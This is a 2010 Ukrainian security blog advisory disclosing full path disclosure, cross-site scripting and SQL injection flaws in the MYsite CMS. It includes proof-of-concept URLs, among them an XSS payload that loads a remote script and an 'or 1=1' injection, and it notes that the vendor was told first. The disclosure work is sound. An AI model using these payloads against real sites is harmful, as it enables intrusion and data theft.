Уразливості в CMS MYsite

15:24 25.09.2010

29.06.2010

У листопаді, 20.11.2009, я знайшов Full path disclosure, Cross-Site Scripting та SQL Injection уразливості в CMS MYsite (це українська комерційна CMS). Які я виявив на lookmy.info - сайті розробників системи. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

25.09.2010

Full path disclosure:

http://site/portal/modules.php?name=Ads

XSS:

http://site/portal/modules.php?name=Web_Links&l_op=search&query=%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20

SQL Injection:

http://site/print.php?id=1&pid=-1%20or%201=1

CMS MYsite зроблена на основі PHP-Nuke, тому SQL Injection подібна до уразливості, що я знаходив в PHP-Nuke та його клонах декілька років тому. В даній CMS можуть бути й інші дірки PHP-Nuke.

Дані уразливості вже виправлені розробником після мого повідомлення (як мінімум в себе на сайті). Але зазначу, що хоча XSS виправлена, але не якісно, тому при виключених mq на сайті (це потрібно для використання лапок) можна провести XSS атаку (для виконання коду або редирекції на інші сайти), зокрема з використанням MouseOverJacking.


Leave a Reply

You must be logged in to post a comment.